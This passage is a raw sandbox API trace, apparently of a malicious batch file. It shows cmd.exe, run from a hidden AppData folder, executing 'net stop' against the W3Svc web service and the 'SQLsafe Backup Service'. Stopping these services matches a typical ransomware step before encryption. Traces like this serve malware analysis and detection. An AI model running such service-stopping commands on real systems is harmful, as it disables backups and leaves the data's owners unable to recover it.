() returned 0x2 [0206.949] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0206.949] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0206.949] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0206.950] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0206.950] SetErrorMode (uMode=0x0) returned 0x1 [0206.950] GetProcessHeap () returned 0x3e0000 [0206.950] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0206.950] GetProcessHeap () returned 0x3e0000 [0206.950] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0206.950] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0206.950] GetProcessHeap () returned 0x3e0000 [0206.950] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0206.950] GetProcessHeap () returned 0x3e0000 [0206.950] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0206.951] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0206.951] GetProcessHeap () returned 0x3e0000 [0206.951] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0206.951] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0206.951] GetProcessHeap () returned 0x3e0000 [0206.951] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0206.951] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0206.951] GetProcessHeap () returned 0x3e0000 [0206.951] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0206.951] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0206.952] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0206.952] GetLastError () returned 0x2 [0206.952] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0206.953] GetLastError () returned 0x2 [0206.953] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0206.953] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0206.953] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0206.954] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0206.954] GetLastError () returned 0x2 [0206.954] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0206.954] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0206.955] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0206.955] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0206.955] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0206.955] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0206.955] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0206.955] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop W3Svc /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop W3Svc /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop W3Svc /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x8f0, dwThreadId=0x330)) returned 1 [0206.959] CloseHandle (hObject=0x74) returned 1 [0206.959] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0206.959] GetProcessHeap () returned 0x3e0000 [0206.959] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0206.959] GetEnvironmentStringsW () returned 0x3f8408* [0206.959] GetProcessHeap () returned 0x3e0000 [0206.959] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0206.960] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0206.960] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0207.089] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0207.090] CloseHandle (hObject=0x78) returned 1 [0207.090] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0207.090] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0207.090] GetProcessHeap () returned 0x3e0000 [0207.090] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0207.090] GetEnvironmentStringsW () returned 0x3f8408* [0207.090] GetProcessHeap () returned 0x3e0000 [0207.090] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0207.090] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0207.090] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0207.090] GetProcessHeap () returned 0x3e0000 [0207.090] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0207.090] GetEnvironmentStringsW () returned 0x3f8408* [0207.090] GetProcessHeap () returned 0x3e0000 [0207.090] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0207.091] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0207.091] GetProcessHeap () returned 0x3e0000 [0207.091] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0207.091] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0207.091] _get_osfhandle (_FileHandle=1) returned 0x264 [0207.091] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0207.091] _get_osfhandle (_FileHandle=1) returned 0x264 [0207.091] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0207.091] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0207.091] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0207.091] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0207.091] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0207.092] SetConsoleInputExeNameW () returned 0x1 [0207.092] GetConsoleOutputCP () returned 0x1b5 [0207.092] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0207.092] SetThreadUILanguage (LangId=0x0) returned 0x409 [0207.092] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0207.092] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0207.092] _get_osfhandle (_FileHandle=3) returned 0x78 [0207.092] SetFilePointer (in: hFile=0x78, lDistanceToMove=4205, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x106d [0207.092] GetProcessHeap () returned 0x3e0000 [0207.092] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0207.092] GetProcessHeap () returned 0x3e0000 [0207.092] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0207.092] GetProcessHeap () returned 0x3e0000 [0207.092] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0207.092] GetProcessHeap () returned 0x3e0000 [0207.092] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0207.092] GetProcessHeap () returned 0x3e0000 [0207.093] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0207.093] GetProcessHeap () returned 0x3e0000 [0207.093] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0207.093] GetProcessHeap () returned 0x3e0000 [0207.093] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0207.093] GetProcessHeap () returned 0x3e0000 [0207.093] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0207.093] GetProcessHeap () returned 0x3e0000 [0207.093] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0207.093] GetProcessHeap () returned 0x3e0000 [0207.093] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0207.093] GetProcessHeap () returned 0x3e0000 [0207.093] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ef4b0 | out: hHeap=0x3e0000) returned 1 [0207.093] GetProcessHeap () returned 0x3e0000 [0207.093] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0207.093] GetProcessHeap () returned 0x3e0000 [0207.093] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0207.093] _get_osfhandle (_FileHandle=3) returned 0x78 [0207.093] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x106d [0207.093] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x854, lpOverlapped=0x0) returned 1 [0207.093] SetFilePointer (in: hFile=0x78, lDistanceToMove=4247, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1097 [0207.093] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=42, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop ΓÇ£SQLsafe Backup ServiceΓÇ¥ /y\r\n\r\neΓÇ¥ /y\r\nures\r\nnded\r\n") returned 42 [0207.094] _get_osfhandle (_FileHandle=3) returned 0x78 [0207.094] GetFileType (hFile=0x78) returned 0x1 [0207.094] _get_osfhandle (_FileHandle=3) returned 0x78 [0207.094] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1097 [0207.094] GetProcessHeap () returned 0x3e0000 [0207.094] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0207.094] GetProcessHeap () returned 0x3e0000 [0207.094] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0207.097] _tell (_FileHandle=3) returned 4247 [0207.097] _close (_FileHandle=3) returned 0 [0207.097] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0207.097] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0207.097] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0207.097] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0207.098] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0207.098] _wcsicmp (_String1="net", _String2="CD") returned 11 [0207.098] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0207.098] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0207.098] _wcsicmp (_String1="net", _String2="REN") returned -4 [0207.098] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0207.098] _wcsicmp (_String1="net", _String2="SET") returned -5 [0207.098] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0207.098] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0207.098] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0207.098] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0207.098] _wcsicmp (_String1="net", _String2="MD") returned 1 [0207.098] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0207.098] _wcsicmp (_String1="net", _String2="RD") returned -4 [0207.098] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0207.098] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0207.098] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0207.098] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0207.098] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0207.098] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0207.098] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0207.098] _wcsicmp (_String1="net", _String2="VER") returned -8 [0207.098] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0207.098] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0207.098] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0207.098] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0207.098] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0207.098] _wcsicmp (_String1="net", _String2="START") returned -5 [0207.098] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0207.098] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0207.098] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0207.098] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0207.098] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0207.098] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0207.098] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0207.098] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0207.098] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0207.098] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0207.099] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0207.099] SetErrorMode (uMode=0x0) returned 0x1 [0207.099] GetProcessHeap () returned 0x3e0000 [0207.099] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0207.099] GetProcessHeap () returned 0x3e0000 [0207.099] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0207.099] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0207.099] GetProcessHeap () returned 0x3e0000 [0207.099] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0207.099] GetProcessHeap () returned 0x3e0000 [0207.099] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0207.100] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0207.100] GetProcessHeap () returned 0x3e0000 [0207.100] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0207.100] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0207.100] GetProcessHeap () returned 0x3e0000 [0207.100] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0207.100] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0207.100] GetProcessHeap () returned 0x3e0000 [0207.100] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0207.101] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0207.101] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0207.101] GetLastError () returned 0x2 [0207.102] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0207.102] GetLastError () returned 0x2 [0207.102] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0207.102] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0207.103] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0207.103] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0207.103] GetLastError () returned 0x2 [0207.103] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0207.103] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0207.104] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0207.104] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0207.105] SetErrorMode (uMode=0x0) returned 0x1 [0207.105] GetProcessHeap () returned 0x3e0000 [0207.105] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0207.105] GetProcessHeap () returned 0x3e0000 [0207.105] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0207.105] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0207.105] GetProcessHeap () returned 0x3e0000 [0207.105] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0207.105] GetProcessHeap () returned 0x3e0000 [0207.105] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0207.105] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0207.105] GetProcessHeap () returned 0x3e0000 [0207.106] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0207.106] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0207.106] GetProcessHeap () returned 0x3e0000 [0207.106] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0207.106] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0207.106] GetProcessHeap () returned 0x3e0000 [0207.106] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0207.106] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0207.107] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0207.107] GetLastError () returned 0x2 [0207.107] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0207.107] GetLastError () returned 0x2 [0207.108] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0207.108] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0207.108] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0207.109] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0207.109] GetLastError () returned 0x2 [0207.109] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0207.109] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0207.109] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0207.110] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0207.110] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0207.110] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0207.110] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0207.110] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop ΓÇ£SQLsafe Backup ServiceΓÇ¥ /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop ΓÇ£SQLsafe Backup ServiceΓÇ¥ /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop ΓÇ£SQLsafe Backup ServiceΓÇ¥ /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x968, dwThreadId=0x8ac)) returned 1 [0207.114] CloseHandle (hObject=0x78) returned 1 [0207.114] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0207.114] GetProcessHeap () returned 0x3e0000 [0207.114] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0207.114] GetEnvironmentStringsW () returned 0x3f8408* [0207.114] GetProcessHeap () returned 0x3e0000 [0207.114] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0207.115] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0207.115] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0207.256] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x1) returned 1 [0207.256] CloseHandle (hObject=0x74) returned 1 [0207.256] 